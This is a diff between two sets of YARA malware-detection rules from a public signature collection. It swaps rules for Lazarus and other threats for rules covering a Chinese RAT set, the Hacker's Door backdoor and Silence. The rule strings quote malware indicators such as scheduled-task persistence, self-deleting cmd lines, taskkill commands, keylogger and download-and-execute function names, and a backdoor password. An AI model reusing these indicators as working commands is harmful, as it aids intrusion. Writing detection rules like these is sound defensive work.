-		$s2 = "ready to finish" fullword ascii
-		$s3 = "EYEnpw" fullword ascii
-		$s4 = "somewhere i belong" fullword ascii
-		$s5 = "Not all fields were assigned" fullword ascii
-		$s6 = "take down" fullword ascii
-		$s7 = "real number = %f" fullword ascii
+		$s1 = "[-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5" fullword ascii
+		$s5 = "[-n tcp_port]    : default use portmapper to determine" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 6 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_D : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Lsls : FILE
 {
 	meta:
-		description = "Detects unspecified malware - October 2016"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6908467c-1ed6-508d-9503-246dd26823e5"
-		date = "2016-10-08"
+		id = "c6c4aa72-1a84-552f-bea0-38b332a74233"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L131-L150"
+		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L13-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "78cde422987d2aff64967b86b6cf9279c112a2bfb713a2ea40fe952379d2e326"
+		logic_hash = "c6542391e8d1a4fe4d26fd8b2dfb1fcab7b39c67dcc6495f2e5f95c4d6f8d61c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cd5f3bc0176a6803093ffdea6a7442c416e0d2945b6903063d17f5bb8d17519d"
+		hash1 = "94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9"
 
 	strings:
-		$s1 = "C:\\file.exe" fullword wide
-		$s2 = "new.exe" fullword wide
-		$s3 = "passwordIterations" fullword ascii
-		$op0 = { 10 00 12 00 1a 00 05 00 01 00 01 00 01 00 10 00 }
-		$op1 = { 41 32 00 36 00 62 00 34 00 32 00 65 00 37 00 62 }
-		$op2 = { 3c 4d 6f 64 75 6c 65 3e 00 6e 65 77 2e 65 78 65 }
+		$x1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0x457f and filesize < 3000KB and $x1
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_E : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_C : FILE
 {
 	meta:
-		description = "Detects unspecified Malware - October 2016"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fffffe0c-e114-5648-96ea-dd692610e34c"
-		date = "2016-10-08"
+		id = "cb0bcdc4-7eca-59b7-a947-85c232d4e599"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L152-L167"
+		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L28-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2040a8cee840560a5aa6065df17206c0313d85b2d11ce482baab05c492360f35"
+		logic_hash = "cfdc7ce8b89a16d2ae604268a030bd41259fed87a7f37b0dca8f7c467703c7f2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "28093385130b61f22920c0ce6e56de1f2cd8eef589bebe2af31f36f51f2b4d01"
+		hash1 = "17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7"
 
 	strings:
-		$s1 = "P3pORt" fullword ascii
-		$s2 = "msdownld.tmp" fullword ascii
-		$s3 = "TMP4351$.TMP" fullword ascii
+		$x1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
+		$x2 = "schtasks /create /sc minute /mo 1 /tn Server /tr " fullword wide
+		$x3 = "www.upload.ee/image/" wide
+		$s1 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
+		$s2 = "/Server.exe" fullword wide
+		$s3 = "Executed As " fullword wide
+		$s4 = "WmiPrvSE.exe" fullword wide
+		$s5 = "Stub.exe" fullword ascii
+		$s6 = "Download ERROR" fullword wide
+		$s7 = "shutdown -r -t 00" fullword wide
+		$s8 = "Select * From AntiVirusProduct" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_APT_Lazarus_Aug18_Downloader_1 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_System3 : FILE
 {
 	meta:
-		description = "Detects Lazarus Group Malware Downloadery"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f536db7b-b645-522f-b750-6431878d2e31"
-		date = "2018-08-24"
+		id = "097f4506-295d-5066-8895-2148436731c1"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L13-L37"
+		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L57-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f6bdaa8aa76da3e679094ae9759a67b5db33d0445f7204ff13e400fa6db60386"
+		logic_hash = "8292ae1de39c57bc5ed6fa078570e92dbcd22cd13d5b5f22d158986708139fbe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d555dcb6da4a6b87e256ef75c0150780b8a343c4a1e09935b0647f01d974d94d"
-		hash2 = "bdff852398f174e9eef1db1c2d3fefdda25fe0ea90a40a2e06e51b5c0ebd69eb"
-		hash3 = "e2199fc4e4b31f7e4c61f6d9038577633ed6ad787718ed7c39b36f316f38befd"
+		hash1 = "73fa84cff51d384c2d22d9e53fc5d42cb642172447b07e796c81dd403fb010c2"
 
 	strings:
-		$x1 = "H:\\DEV\\TManager\\" ascii
-		$x2 = "\\Release\\dloader.pdb" ascii
-		$x3 = "Z:\\jeus\\"
-		$x4 = "\\Debug\\dloader.pdb" ascii
-		$x5 = "Moz&Wie;#t/6T!2yW29ab@ad%Df324V$Yd" fullword ascii
-		$s1 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" fullword ascii
-		$s2 = "Error protecting memory page" fullword ascii
+		$a1 = "WmiPrvSE.exe" fullword wide
+		$s1 = "C:\\Users\\sgl\\AppData\\Local\\" ascii
+		$s2 = "Temporary Projects\\WmiPrvSE\\" ascii
+		$s3 = "$15a32a5d-4906-458a-8f57-402311afc1c1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 1 of ( $x* ) or 2 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $a1 and 1 of ( $s* )
 }
 
-rule SIGNATURE_BASE_APT_Lazarus_Aug18_1 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal1 : FILE
 {
 	meta:
-		description = "Detects Lazarus Group Malware"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fda4970a-2787-5e9c-9944-a6222145f4a7"
-		date = "2018-08-24"
+		id = "8516bbfb-a2ad-565d-bf6c-71629b1831a1"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L39-L60"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L77-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "efd43e2d84ba964e7fc7e6c03eaba3dd5181c9cbe51b4a06a7a723dca95fab17"
+		logic_hash = "cf532761d07ee3e84028a9071409f081a7a85728d55c215c912f0b70902f101f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef400d73c6920ac811af401259e376458b498eb0084631386136747dfc3dcfa8"
-		hash2 = "1b8d3e69fc214cb7a08bef3c00124717f4b4d7fd6be65f2829e9fd337fc7c03c"
+		hash1 = "173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e"
 
 	strings:
-		$s1 = "mws2_32.dll" fullword wide
-		$s2 = "%s.bat" fullword wide
-		$s3 = "%s%s%s \"%s > %s 2>&1\"" fullword wide
-		$s4 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s5 = "ping 127.0.0.1 -n 3" fullword wide
+		$x1 = "%SystemRoot%\\system32\\termsrvhack.dll" fullword ascii
+		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$a1 = "taskkill /f /im cmd.exe" fullword ascii
+		$a2 = "taskkill /f /im mstsc.exe" fullword ascii
+		$a3 = "taskkill /f /im taskmgr.exe" fullword ascii
+		$a4 = "taskkill /f /im regedit.exe" fullword ascii
+		$a5 = "taskkill /f /im mmc.exe" fullword ascii
+		$s1 = "K7TSecurity.exe" fullword ascii
+		$s2 = "ServUDaemon.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3af996e4f960108533e69b9033503f40" or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "28e3a58132364197d7cb29ee104004bf" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT_Lazarus_Aug18_2 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Keylogger_1 : FILE
 {
 	meta:
-		description = "Detects Lazarus Group Malware"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c77d603-6443-5e78-8a8a-a89112619aa6"
-		date = "2018-08-24"
+		id = "12eff9b6-1a65-5efc-b39c-88297bdae9c3"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L62-L82"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L105-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "75d52ad829383392d9eb20a8308278d073d16f7624e60010356534bdc6acc81f"
+		logic_hash = "efba7004614c690e469082255cf7b5cb62cac5da2bfcc26e036e2eafcb5728f9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ae766795cda6336fd5cad9e89199ea2a1939a35e03eb0e54c503b1029d870c4"
-		hash2 = "d3ef262bae0beb5d35841d131b3f89a9b71a941a86dab1913bda72b935744d2e"
+		hash1 = "c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf"
 
 	strings:
-		$s1 = "vAdvapi32.dll" fullword wide
-		$s2 = "lws2_32.dll" fullword wide
-		$s3 = "%s %s > \"%s\" 2>&1" fullword wide
-		$s4 = "Not Service" fullword wide
-		$s5 = "ping 127.0.0.1 -n 3" fullword wide
+		$x2 = "Process already elevated." fullword wide
+		$x3 = "GetKeyloggErLogsResponse" fullword ascii
+		$x4 = "get_encryptedPassword" fullword ascii
+		$x5 = "DoDownloadAndExecute" fullword ascii
+		$x6 = "GetKeyloggeRLogs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_Fallchill_RC4_Keys : FILE
+
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal4 : FILE
 {
 	meta:
-		description = "Detects FallChill RC4 keys"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ead7d84c-91aa-58b0-af3b-1211b0bde864"
-		date = "2018-08-21"
+		id = "6165caf5-157f-5381-a77e-6ed775187ab1"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/operation-applejeus/87553/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L84-L100"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L124-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "59861618dba256996d7bbcd94a6efccdb64589fc75086bfe7d980fa51761ef97"
+		logic_hash = "044901271adb06036e7d5aa8f2b6f893be10445bee95453c293d0025994e8d21"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f7549c74f09be7e4dbfb64006e535b9f6d17352e236edc2cdb102ec3035cf66e"
 
 	strings:
-		$cod0 = { c7 ?? ?? da e1 61 ff
-                c7 ?? ?? 0c 27 95 87
-                c7 ?? ?? 17 57 a4 d6
-                c7 ?? ?? ea e3 82 2b }
+		$s1 = "Microsoft .Net Framework COM+ Support" fullword ascii
+		$s2 = "Microsoft .NET and Windows XP COM+ Integration with SOAP" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them and pe.exports ( "SPACE" )
 }
-rule SIGNATURE_BASE_PUP_Computraceagent : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal5 : FILE
 {
 	meta:
-		description = "Absolute Computrace Agent Executable"
-		author = "ASERT - Arbor Networks (slightly modified by Florian Roth)"
-		id = "676f8f1e-a3b4-5d05-b13b-bd6cb0aabbbd"
-		date = "2018-05-01"
+		description = "Detects malware from disclosed CN malware set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1933610-9e6d-5eed-ba30-ccdd0d3a6124"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_computrace_agent.yar#L1-L14"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L140-L160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "65e964e68be1e286ab3aa39677e250cf5994a7a08d0f6db286c0260cf77d6c48"
+		logic_hash = "971276d5033477a08a1ec037cff9735667c2b4f7d9d4a7bcd88f2b1d8c348d4f"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "24c05cd8a1175fbd9aca315ec67fb621448d96bd186e8d5e98cb4f3a19482af4"
+		hash2 = "05696db46144dab3355dcefe0408f906a6d43fced04cb68334df31c6dfd12720"
 
 	strings:
-		$a = { D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04 }
-		$b1 = { 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00 }
-		$b2 = { 54 61 67 49 64 00 }
+		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+		$s2 = "Server.exe" fullword ascii
+		$s3 = "System.Windows.Forms.Form" fullword ascii
+		$s4 = "Stub.Resources.resources" fullword ascii
+		$s5 = "My.Computer" fullword ascii
+		$s6 = "MyTemplate" fullword ascii
+		$s7 = "Stub.My.Resources" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( $a or ( $b1 and $b2 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Manageengine_CVE_2022_47966_Jan23_1
+
+rule SIGNATURE_BASE_Hkdoor_Backdoor_Dll : FILE
 {
 	meta:
-		description = "Detects indicators of exploitation of ManageEngine vulnerability as described by Horizon3"
-		author = "Florian Roth (Nextron Systems)"
-		id = "07535b9c-8611-5a46-bcd7-f94070de2aea"
-		date = "2023-01-13"
+		description = "Hacker's Door Backdoor DLL"
+		author = "Cylance Inc."
+		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.horizon3.ai/manageengine-cve-2022-47966-iocs/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_manageengine_jan23.yar#L2-L14"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a62064e4f12632ba6c14cbbd9369ee919536334f19021a177c126b5dff7e568c"
+		logic_hash = "77901d1f2d6c53161c79b50ef20eeb424bf1b8b32906302ca10f3c4b82a58e2a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$ = "]: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|"
+		$s1 = "The version of personal hacker's door server is" fullword ascii
+		$s2 = "The connect back interval is %d (minutes)" fullword ascii
+		$s3 = "I'mhackeryythac1977" fullword ascii
+		$s4 = "Welcome to http://www.yythac.com" fullword ascii
+		$s5 = "SeLoadDriverPrivilege" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 3 of ( $s* ) ) and pe.characteristics & pe.DLL and pe.imports ( "ws2_32.dll" , "WSAStartup" ) and pe.imports ( "ws2_32.dll" , "sendto" )
 }
-rule SIGNATURE_BASE_APT_MAL_DNS_Hijacking_Campaign_AA19_024A : FILE
+rule SIGNATURE_BASE_Hkdoor_Backdoor : FILE
 {
 	meta:
-		description = "Detects malware used in DNS Hijackign campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6a476052-ba4e-5049-9c7a-f8949d26e7b5"
-		date = "2019-01-25"
+		description = "Hacker's Door Backdoor"
+		author = "Cylance Inc."
+		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/AA19-024A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aa19_024a.yar#L2-L19"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e9ec132df6cf6a89f6694682292feec0f3a762c2df6b1dc8180d9ab68e7183b"
+		logic_hash = "3fc71c971bf0908e044e3e0ec3f266b8dfaae33bcfbf1b10619375fc7b5e7f5e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
-		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
 
 	strings:
-		$s2 = "/Client/Login?id=" fullword ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s4 = ".\\Configure.txt" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"files\"; filename=\"" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
+		$s1 = "http://www.yythac.com" fullword ascii
+		$s2 = "Example:%s 192.168.1.100 139 -p yyt_hac -t 1" fullword ascii
+		$s3 = "password-----------The hacker's door's password" fullword ascii
+		$s4 = "It is the client of hacker's door %d.%d public version" fullword ascii
+		$s5 = "hkdoordll.dll" fullword ascii
+		$s6 = "http://www.yythac.com/images/mm.jpg" fullword ascii
+		$s7 = "I'mhackeryythac1977" fullword ascii
+		$s8 = "yythac.yeah.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_WEBSHELL_Csharp_Hash_String_Oct22 : FILE
+
+rule SIGNATURE_BASE_Hkdoor_Dropper : FILE
 {
 	meta:
-		description = "C# webshell using specific hash check for the password."
-		author = "Nils Kuhnert (modified by Florian Roth)"
-		id = "c7d459be-5e61-57b7-b738-051c0cec62d2"
-		date = "2022-10-27"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshell_csharp.yar#L2-L25"
+		description = "Hacker's Door Dropper"
+		author = "Cylance Inc."
+		id = "8c8171b9-6256-591a-8f74-abac1cb9a50b"
+		date = "2018-01-01"
+		modified = "2023-01-07"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L53-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "29c187ad46d3059dc25d5f0958e0e8789fb2a51b9daaf90ea27f001b1a9a603c"
-		logic_hash = "28a07f3dd17fc469388867fa82a0e21abeee9c4e114af245b684535e4e194891"
-		score = 60
+		logic_hash = "521836ff95142d276152687f7c36e8f503f168f101976022431efd13a6adf7e4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$gen1 = "void Page_Load" ascii
-		$gen2 = "FromBase64String" ascii
-		$gen3 = "CryptoServiceProvider" ascii
-		$gen4 = "ComputeHash" ascii
-		$hashing1 = "BitConverter.ToString(" ascii
-		$hashing2 = ").Replace(\"-\", \"\") == \"" ascii
-		$filter1 = "BitConverter.ToString((" ascii
+		$s1 = "The version of personal hacker's door server is" fullword ascii
+		$s2 = "The connect back interval is %d (minutes)" fullword ascii
+		$s3 = "I'mhackeryythac1977" fullword ascii
+		$s4 = "Welcome to http://www.yythac.com" fullword ascii
+		$s5 = "SeLoadDriverPrivilege" fullword ascii
+		$s6 = "\\drivers\\ntfs.sys" ascii
+		$s7 = "kifes" fullword ascii
 
 	condition:
-		filesize < 10KB and all of ( $gen* ) and all of ( $hashing* ) and not 1 of ( $filter* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) ) and pe.number_of_resources > 0 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ i ] . type_string == "B\x00I\x00N\x00" and uint16( pe.resources [ i ] . offset ) == 0x5A4D ) and pe.imports ( "KERNEL32.dll" , "FindResourceW" ) and pe.imports ( "KERNEL32.dll" , "LoadResource" )
 }
-rule SIGNATURE_BASE_APT_UNC1151_Windowsinstaller_Silent_Installproduct_Macromethod : FILE
+
+rule SIGNATURE_BASE_Hkdoor_Driver : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Proofpoint Threat Research"
-		id = "9ae80d54-33b9-55d7-957f-0738243e089f"
-		date = "2021-07-28"
-		modified = "2023-12-05"
-		reference = "Thttps://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc1151_ua.yar#L1-L16"
+		description = "Hacker's Door Driver"
+		author = "Cylance Inc."
+		id = "50b763a9-6d4f-59dd-ba6c-27e2ae117523"
+		date = "2018-01-01"
+		modified = "2023-01-07"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L81-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aec1bb992061fdf1abf5c1a61cf9ec9e54c1f13be36ceb84890b058ade273b70"
+		logic_hash = "68ac505d67af5361f096529697e621c83a4628f21c213fcea6652905f87ebe00"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "1561ece482c78a2d587b66c8eaf211e806ff438e506fcef8f14ae367db82d9b3"
-		hash2 = "a8fd0a5de66fa39056c0ddf2ec74ccd38b2ede147afa602aba00a3f0b55a88e0"
 
 	strings:
-		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
-		$s1 = ".UILevel = 2"
-		$s2 = "CreateObject(\"WindowsInstaller.Installer\")"
-		$s3 = ".InstallProduct \"http"
+		$s1 = "ipfltdrv.sys" fullword ascii
+		$s2 = "Patch Success." fullword ascii
+		$s3 = "\\DosDevices\\kifes" ascii
+		$s4 = "\\Device\\kifes" ascii
+		$s5 = {75 28 22 36 30 5b 4a 77 7b 58 4d 6c 3f 73 63 5e 38 47 7c 7d 7a 40 3a 41 2a 45 4e 44 79 64 67 6d 65 74 21 39 23 3c 20 49 43 69 4c 3b 31 57 2f 55 3e 26 59 62 61 54 53 5a 2d 25 78 35 5c 76 3d 34 27 6b 5f 72 2c 32 4f 2b 71 66 42 33 37 56 52 60 5d 29 4b 51 2e 6f 50 68 6e 6a 24 48 7e 46 70}
 
 	condition:
-		$doc_header at 0 and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_NATIVE and ( 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_RU_WIN_Snake_Malware_May23_1 : MEMORY
+
+rule SIGNATURE_BASE_Silence_Malware_1 : FILE
 {
 	meta:
-		description = "Hunting Russian Intelligence Snake Malware"
-		author = "Matt Suiche (Magnet Forensics)"
-		id = "53d2de3c-350c-5090-84bb-b6cde16a80ad"
-		date = "2023-05-10"
-		modified = "2025-03-21"
-		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_ru_snake_may23.yar#L17-L42"
+		description = "Detects malware sample mentioned in the Silence report on Securelist"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f932e3fe-a2d7-55b7-b581-88c0ed45723e"
+		date = "2017-11-01"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/the-silence/83009/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_silence.yar#L13-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7cff7152259bb17a9b72b91f0fbef220aad2f35a1d2758d7225316a9896bf845"
-		score = 70
-		quality = 71
-		tags = "MEMORY"
-		threat_name = "Windows.Malware.Snake"
-		scan_context = "memory"
-		license = "MIT"
